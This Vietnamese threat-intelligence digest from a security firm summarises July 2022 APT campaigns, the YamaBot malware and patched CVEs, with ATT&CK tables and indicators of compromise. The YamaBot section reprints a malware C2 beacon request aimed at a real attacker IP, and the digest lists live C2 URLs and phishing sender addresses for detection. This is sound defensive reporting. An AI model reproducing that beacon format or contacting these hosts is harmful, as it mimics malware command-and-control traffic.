Thông tin các mối đe dọa bảo mật trong tháng 07 - 2022

Thông tin các mối đe dọa bảo mật trong tháng 07 - 2022

Hàng tháng, Chúng tôi - GTSC tổng hợp lại các thông tin về bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài tổng hợp.
 

1. Các mối đe dọa nâng cao – Advanced Threats

1.1 Evilnum APT hoạt động trở lại với các TTPs và mục tiêu mới

Ngày 27/06/2022, nhóm ThreatLabz của Zscaler đã thông báo về các hoạt động mới nhất của nhóm Evilnum APT mà họ đã theo dõi được từ đầu năm 2022. Những cuộc tấn công gần đây cho thấy nhóm Evilnum APT đã thay đổi các chiến thuật, kỹ thuật và quy trình (TTPs). Vào năm 2021, vector phân phối chính được nhóm này sử dụng là các tệp Windows Shortcut (LNK) được gửi bên trong các tệp lưu trữ độc hại (ZIP) dưới dạng tệp đính kèm trong các email lừa đảo gửi tới nạn nhân.

Trong các trường hợp gần đây nhất, nhóm Evilnum APT đã bắt đầu sử dụng kỹ thuật “template injection” trong các tài liệu MS Office Word để gửi tải trọng độc hại đến máy của nạn nhân. Các tài liệu “template injection” chứa mã macro đã tận dụng kỹ thuật VBA code stomping để tránh bị phát hiện qua phân tích tĩnh và cũng để ngăn chặn kỹ thuật đảo ngược.

Kẻ tấn công cũng sử dụng tệp JavaScript bị xáo trộn dùng để giải mã và trích xuất tải trọng trên máy nạn nhân. Tệp JavaScript cũng lên lịch một tác vụ scheduled task để chạy tệp nhị phân. Tệp JavaScript này có những cải tiến đáng kể trong kỹ thuật obfuscation so với các phiên bản trước được nhóm EvilNum APT sử dụng.

Tên của tất cả các hệ thống tệp được tạo ra trong quá trình thực thi đã được kẻ tấn công lựa chọn để giả mạo tên của các tệp Windows hợp pháp và của bên thứ ba khác. Trong mỗi trường hợp mới của chiến dịch, nhóm APT đã đăng ký nhiều tên miền sử dụng các từ khóa liên quan đến ngành được nhắm mục tiêu.

Hình 1: Luồng tấn công

ATT&CK MATRIX

TACTIC

TECHNIQUE

NAME

Resource Development

T1583.001

Acquire Infrastructure: Domains

Initial Access

T1566.001

Phishing: Spearphishing Attachment

Execution

T1059.005

Command and Scripting Interpreter: Visual Basic

Execution

T1059.007

Command and Scripting Interpreter: JavaScript

Defense Evasion

T1221

Template Injection

Defense Evasion

T1027

Obfuscated Files or Information

Defense Evasion

T1036.005

Masquerading: Match Legitimate Name or Location

Persistence

T1053.005

Scheduled Task/Job: Scheduled Task

Command and Control

T1132.001

Data Encoding: Standard Encoding

Exfiltration

T1041

Exfiltration Over C2 Channel

Indicators of Compromise (IoCs)

Files / hash MD5

0b4f0ead0482582f7a98362dbf18c219 

4406d7271b00328218723b0a89fb953b 

61776b209b01d62565e148585fda1954 

6d329140fb53a3078666e17c249ce112 

db0866289dfded1174941880af94296f

f0d3cff26b419aff4acfede637f6d3a2 

79157a3117b8d64571f60fe62c19bf17 

63090a9d67ce9534126cfa70716d735f

f5f9ba063e3fee25e0a298c0e108e2d4 

ea71fcc615025214b2893610cfab19e9

51425c9bbb9ff872db45b2c1c3ca0854 

 

C2 Domain

travinfor[.]com

webinfors[.]com

khnga[.]com

netwebsoc[.]com

infcloudnet[.]com

bgamifieder[.]com

bunflun[.]com

refinance-ltd[.]com

book-advp[.]com

mailservice-ns[.]com

advertbart[.]com

inetp-service[.]com

yomangaw[.]com

covdd[.]org

visitaustriaislands[.]com

traveladvnow[.]com

tripadvit[.]com

moreofestonia[.]com

moretraveladv[.]com

estoniaforall[.]com

bookingitnow[.]org

travelbooknow[.]org

bookaustriavisit[.]com

windnetap[.]com

roblexmeet[.]com

netrcmapi[.]com

meetomoves[.]com

bingapianalytics[.]com

azuredcloud[.]com

appdllsvc[.]com

udporm[.]com

pcamanalytics[.]com

nortonalytics[.]com

deltacldll[.]com

mscloudin[.]com

msdllopt[.]com 

Nguồn: https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets

1.2 Bitter APT tiếp tục nhắm mục tiêu đến Bangladesh

Ngày 05/07/2022, Nhóm SECUINFRA Falcon đã phân tích một cuộc tấn công gần đây được thực hiện bởi nhóm “Bitter” APT ở Nam Á, còn được gọi là T-APT-17. Chiến dịch đang nhắm mục tiêu cụ thể vào các tổ chức (quân sự) từ Bangladesh. Thông qua các tệp tài liệu độc hại và các giai đoạn phần mềm độc hại trung gian, các kẻ tấn công tiến hành gián điệp bằng cách triển khai các Trojan Truy cập Từ xa (RATs).

Phương thức lây nhiễm quen thuộc của Bitter APT là gửi tệp tin qua các email lừa đảo. Chúng tận dụng lỗ hổng khai thác Equation Editor (CVE-2018-0798) ảnh hưởng trên Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013 và Microsoft Office 2016. Một khi nạn nhân mở tệp, mã độc hại (shellcode) sẽ được thực thi mà không có một cảnh báo nào cho nạn nhân.

Hình 2: Một số lệnh gọi API quan trọng trong shellcode

Nhóm SECUINFRA Falcon cũng phân tích một biến thể Trojan truy cập từ xa do Bitter sử dụng (BitterRAT). Nhóm SECUINFRA Falcon gọi biến thể này là “Almond RAT”. Mục đích chính của Almond RATs dường như là khám phá hệ thống tệp, lấy cắp dữ liệu và một cách để tải thêm các công cụ hay duy trì kết nối bên trong hệ thống nạn nhân.

ATT&CK MATRIX

TACTIC

TECHNIQUE

NAME

Reconnaissance

T1592.002

Gather Victim Host Information: Software

Resource Development

T1608.001

Stage Capabilities: Upload Malware

Initial Access

T1566.001

Phishing: Spearphishing Attachment

Execution

T1203

Exploitation for Client Execution

Defense Evasion

T1027

Obfuscated Files or Information

Discovery

T1083

File and Directory Discovery

Command and Control

T1105

Ingress Tool Transfer

Command and Control

T1571

Non-Standard Port

Exfiltration

T1041

Exfiltration over C2 Channel

Exfiltration

T1030

Data Transfer Size Limits

Impact

T1485

Data Destruction

Indicators of Compromise (IoCs)

Files / hash MD5

1bf615946ad9ea7b5a282a8529641bf6

 a1d9e1dccfbba118d52f95ec6cc7c943

6e4b4eb701f3410ebfb5925db32b25dc

71e1cfb5e5a515cea2c3537b78325abf

d58e6f93bd1eb81eacc965d530709246

 

C2 Domain

emshedulersvc[.]com/vc/vc

m.huandocimama[.]com

diyefosterfeeds[.]com

91.195.240[.]103

194.36.191[.]196

162.0.232[.]109

64.44.131[.]109

Nguồn: https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/

1.3 Tấn công có mục tiêu vào các cơ quan chính phủ.

Ngày 13/07/2022, Nhóm nghiên cứu Bảo mật Email Trellix thông báo về một chiến dịch độc hại nhắm vào các cơ quan chính phủ của Afghanistan, Ấn Độ, Ý, Ba Lan và Hoa Kỳ kể từ năm 2021. Cuộc tấn công bắt đầu bằng một email lừa đảo có chủ đề chính trị. Các email lừa đảo có chủ đề xoay quanh mối quan hệ giữa Ấn Độ với Afghanistan. Kẻ tấn công đã sử dụng chính trị như một chiêu dụ để lừa người dùng nhấp vào một liên kết độc hại.

Email được sử dụng cho cuộc tấn công lừa đảo này chứa một tệp đính kèm hoặc một URL để cung cấp một tệp Excel. Khi mở tệp Excel sẽ thực thi một macro độc hại được nhúng, sau đó sẽ giải mã và cài đặt Trojan Truy cập Từ xa (AsyncRAT & LimeRAT) và duy trì tính kết nối bên trong mạng nạn nhân.

Sau khi Trojan Truy cập Từ xa được cài đặt trên máy nạn nhân, nó thiết lập giao tiếp với máy chủ Command-and-Control được sử dụng để lấy dữ liệu nạn nhân. Trojan Truy cập Từ xa có khả năng chụp ảnh màn hình, ghi lại các tổ hợp phím, ghi lại thông tin xác thực / thông tin bí mật và thêm các máy tính bị nhiễm vào mạng botnet. Nó cũng có thể thực hiện khám phá mạng và di chuyển sang các hệ thống khác trong tổ chức bị ảnh hưởng.

Hình 3. Luồng tấn công

Những kẻ tấn công đã sử dụng dịch vụ thư miễn phí Gmail để gửi các email lừa đảo trực tuyến. Dựa trên phân tích tiêu đề email, rõ ràng là các email có nguồn gốc từ các máy chủ của Google và được gửi từ khu vực Nam Á. Múi giờ của người gửi email (+0500 UTC) càng cho thấy sự tham gia của các tác nhân đe dọa Nam Á.

Hình 4, Tiêu đề email

ATT&CK MATRIX

TACTIC

TECHNIQUE

NAME

Command and Control

T1071

Application Layer Protocol

Defense Evasion

T1036

Masquerading

Collection

T1056

Input Capture

Collection

T1113

Screen Capture

Collection

T1115

Clipboard Data

Discovery

T1049

System Network Connections Discovery

Persistenc

T1547

Boot or Logon Autostart Execution

Persistenc

T1137

Office Template Macros

Execution

T1204

User Execution

Exfiltration

T1041

Exfiltration Over C2 Channel

Indicators of Compromise (IoCs)

Files / hash SHA256

7a6b87a7ba79160232579157b8ebcaea7660392d98cb6b8b3d562a383a0894bc

5e44f769aa9a745ade82589bbbd17c3687f2fb7c08b1043d8c5c44d28eaa20a9

fe1c8b01f5abc62551b0a3f59fe1675c66dd506d158f5de495a5d22d7445e6e9

fa9cb5608841f023052379818a9186496526039bc47cac05a6866f5fb0e70fc5

080fcc70c11248eaf34bd30c0dc9800b0b1742fe92c96c9995a1c73c0adf2336

465a59b7a97364bc933703a8fda715090c6a927f814bc22a0057e6a7134cb69f

5e082d1c85e591aebb380d7d7af56000ac0ef5fc32e216cb5fe7027bb9861743

f59dc209ee236e5ed78f83117865164e57a223f742c75f57c20d3da4cbe179e0

f32b0d71274ea93f27527079371e5e926e8d6a6f29d84ac602e48da0332c9f4c

8248432bcba6e8bb8731c0b8f2fbe4aae2e2d0fee2157477c83343743c39c1a8

06064b3b0158efbfa9d849c853a9783c7e9d07c5924275d0d33c6ac74c78eec7

886c5883113d279d97caaca2714860dfceb421c7297dbb3ee04a00b7d50b821b

b9584cf67e73a759d6c412962d4a9d7471c703f72e056cd24742a4b78c68ff2d

C2 Domain

107.173.143.111

https://drive.Google.com/u/0/uc?id=1nU6-jGVnOKeZofflu8hfx2t83lAB9TPI&export=download

Email Senders:

kabul.contact@gmail.com

mashrefhaideri@gmail.com

latifmahmood66666@gmail.com

fscon.kab@gmail.com

admn.kabul@gmail.com

ravish49.ndtv@gmail.com

Nguồn: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html

2. Malware

2.1 Nhóm APT Lazarus sử dụng mã độc YamaBot

Yamabot là mã độc được viết bằng ngôn ngữ Golang, nhắm tới hệ điều hành Linux, các báo cáo gần đây phát hiện Yamabot được phát triển nhắm tới hệ điều hành Windows

Yamabot giao tiếp với C2 server sử dụng HTTP Post request với UserAgent được mã hóa bằng base64

Sau khi kết nối thành công tới C2 server, Yamabot gửi request mới với trường cookie trong header. Nội dung trong trường cookie bao gồm:

  • captcha_session chứa dữ liệu theo format  [16bytes đầu là ký tự ngẫu nhiên][ 16 bytes tiếp theo là key RC4][4 bytes cuối cùng là các ký  tự ngẫu nhiên], captcha_session được mã hóa bằng thuật toán base64

  • captcha_val chứa thông tin thiết bị và kết quả của các câu lệnh được mã hóa hai lần bằng thuật toán RC4 và thuật toán Base64. Ở lần đầu, dữ liệu trong trường captcha_val sẽ gửi thông tin về phiên bản OS và địa chỉ IP

POST /editor/session/aaa000/support.php HTTP/1.1
Host: 213.180.180.154
User-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNg==
Connection: close
Content-Length: 0<
Cookie: captcha_session=MTE5NzZmMTYwYzRlNTU4YjhhNDZhMTM4ZGMwNzgzNTNhNmUy; captcha_val=W%2BIePQNeokInrSpb%2Fw1rTLAZvJAZQHmqAm2rXWdTsCvZ
Accept-Encoding: gzip

 

Trong trường hợp dữ liệu có kích thước lớn, dữ liệu sẽ được gửi dưới định dạng BMP thay vì sử dụng captcha_val

Malware thực thi các câu lệnh tùy thuộc vào hệ điều hành. Đối với hệ điều hành Linux, câu lệnh được thực thi bằng /bin/sh. Đối với Windows, mã độc thực hiện câu lệnh sau

  • dir: Thu thập thông tin các file

  • Mapfs: Thu thập thông tin các thư mục

  • Download: Download file

  • Info: Gửi thông tin về đường dẫn và PID

  • Sleep: Thay đổi thời gian sleep

  • Uninstall: Mã độc tự xóa chính bản thân

  • i: Thay đổi thời gian

  • Others: Thực thi câu lệnh khác vơi shell command

Các câu lệnh được thực thi theo định dạng sau: [command][command parameters]

Indicators of Compromise (IoCs)

Hash:

f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb

6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1

C&C server:

http://www.karin-store.com/recaptcha.php

http://yoshinorihirano.net/wp-includes/feed-xml.php

http://213.180.180.154/editor/session/aaa000/support.php

3. CVE và các khuyến nghị bảo mật

3.1 Microsoft Patch Tuesday – July 2022

Trong tháng 7, Microsoft đã phát hành các bản vá cho 84 CVE mới trong các sản phẩm của Microsoft Windows and Windows Components; Windows Azure components; Microsoft Defender for Endpoint; Microsoft Edge (Chromium-based); Office and Office Components; Windows BitLocker; Windows Hyper-V; Skype for Business and Microsoft Lync; Open-Source Software; and Xbox. Trong đó có 4 lỗ hổng được đánh giá mức độ Nghiêm trọng, 80 lỗ hổng được đánh giá là Improtant

Dưới đây là một số CVE nổi bật được đánh giá ở mức độ Critical và Improtant:  

3.1.1 CVE-2022-22047 – Windows CSRSS Elevation of Privilege.

CVSS v3: 7.8

Mô tả: Lỗ hổng leo thang đặc quyền cho phép kẻ tấn công thực thi đoạn mã độc hại bằng quyền SYSTEM. Lỗ hổng được ghi nhận đang được khai thác bởi nhiều nhóm tấn công.

Phiên bản ảnh hưởng

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019  (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: 

 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047

 

3.1.2 CVE-2022-22029 – Windows Network File System Remote Code Execution Vulnerability.

CVSS v3: 8.1

Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã độc hại trên hệ thống bị ảnh hưởng. Lỗ hổng không yêu cầu tương tác từ người dùng.

Phiên bản ảnh hưởng

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016  (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019  (Server Core installation)

Windows Server 2019

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: 

 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029

 

3.1.3 CVE-2022-22038 - Remote Procedure Call Runtime Remote Code Execution Vulnerability.

CVSS v3: 8.1

Mô tả: Lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã độc hại trên hệ thống bị ảnh hưởng. Lỗ hổng yêu cầu độ phức tạp cao trong quá trình khai thác.

Phiên bản ảnh hưởng

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows Server 2016  (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019  (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng: 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038

 

3.2 Ứng dụng web và các sản phẩm khác 

3.2.1 CVE-2022-2294: Heap buffer overflow in WebRTC.

Mô tả: Tồn tại lỗ hổng tràn bộ đệm heap-based trong WebRTC. Lỗ hổng cho phép kẻ tấn công thực thi mã từ tùy ý. Được Google ghi nhận đang được khai thác bởi nhiều nhóm tấn công.

Phiên bản ảnh hưởng

Ảnh hưởng đến các phiên bản thấp hơn bản cập nhật Chrome version 103.0.5060.114 (Stable channel)

Khuyến nghị:  Trình duyệt Chrome đã cung cấp tính năng tự động cập nhật. Đối với các máy tắt tính năng cập nhật tự động, khách hàng có thể thực hiện cập nhật từ Google Chrome menu -> chọn Help -> chọn About Google Chrome để tiến hành cập nhật.

 

3.2.2 CVE-2022-22982 - vCenter Server SSRF vulnerability

CVSS v3: 5.1

Mô tả: Tồn tại lỗ hổng SSRF trong vCenter Server, được Vmware đánh giá mức độ Moderate

Phiên bản ảnh hưởng

VMware vCenter Server (vCenter Server)

VMware Cloud Foundation (Cloud Foundation)

Khuyến nghị:  

Cài đặt cập nhật bản vá theo hướng dẫn của hãng: 

https://www.vmware.com/security/advisories/VMSA-2022-0018.html

 

Các gói dịch vụ

Liên hệ

Name
Email
Phone
Message